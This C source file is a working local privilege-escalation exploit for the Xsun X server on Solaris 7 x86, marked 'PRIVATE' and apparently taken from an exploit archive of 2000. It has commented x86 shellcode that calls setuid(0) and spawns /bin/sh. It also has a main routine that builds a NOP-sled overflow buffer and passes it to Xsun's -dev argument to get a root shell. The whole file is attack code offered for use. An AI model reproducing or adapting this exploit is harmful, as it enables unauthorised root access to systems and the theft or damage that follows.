/* * PRIVATE. DO NOT DISTRIBUTE. * * Xsun (solaris 7 x86) local root stack overflow. * by anathema * */ #include #include #include #define RETPOS 3217 #define OFFSET 6000 char c0de[] = /* main: */ "\xeb\x0a" /* jmp ahead */ /* a_lcall: */ "\x9a\x78\x78\x78\x5c\x07\x78" /* lcall */ "\xc3" /* ret */ /* jmp_0: */ "\xeb\x05" /* jmp start_0 */ /* ahead: */ "\xe8\xf9\xff\xff\xff" /* call jmp_0 */ /* start_0: */ /* setuid(0); - yes, this is necessary */ "\x5e" /* popl %esi */ "\x2b\xc0" /* subl %eax, %eax */ "\x88\x46\xf7" /* movb %al, 0xfffffff7(%esi) */ "\x89\x46\xf2" /* movl %eax, 0xfffffff2(%esi) */ "\x50" /* pushl %eax */ "\xb0\x17" /* movb $0x17, %al */ "\xe8\xe0\xff\xff\xff" /* call a_lcall */ "\xeb\x1f" /* jmp callz */ /* start: */ /* execve /bin/sh */ "\x5e" /* popl %esi */ "\x8d\x1e" /* leal (%esi), %ebx */ "\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi) */ "\x2b\xc0" /* subl %eax, %eax */ "\x88\x46\x19" /* movb %al, 0x19(%esi) */ "\x89\x46\x14" /* movl %eax, 0x14(%esi) */ "\x89\x46\x0f" /* movl %eax, 0x0f(%esi) */ "\x89\x46\x07" /* movl %eax, 0x07(%esi) */ "\xb0\x3b" /* movb $0x3b, %al */ "\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */ "\x51" /* pushl %ecx */ "\x51" /* pushl %ecx */ "\x53" /* pushl %ebx */ "\x50" /* pushl %eax */ "\xeb\x18" /* jmp lcall */ /* callz: */ "\xe8\xdc\xff\xff\xff" /* call start */ "\x2f\x62\x69\x6e\x2f\x73\x68" /* /bin/sh */ "\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall */ int main(int argc, char **argv) { u_char buf[8192] = {0}; u_long addr = &addr; int ret = RETPOS, i = 0; fprintf(stderr, "Xsun local root overflow, solaris 7 x86\n" "Copyright (c) anathema \n\n"); if (argc > 1) addr += atoi(argv[1]); else addr += OFFSET; fprintf(stderr, "-> 0x%lx\n", addr); buf[0] = ':'; memset(buf + 1, 0x90, ret); memcpy(buf + ret - strlen(c0de), c0de, strlen(c0de)); buf[ret++] = (addr & 0xff); buf[ret++] = (addr >> 8) & 0xff; buf[ret++] = (addr >> 16) & 0xff; buf[ret++] = (addr >> 24) & 0xff; execl("/usr/openwin/bin/Xsun", "Xsun", "-dev", buf, NULL); perror("execl"); } /* www.hack.co.za [2000]*/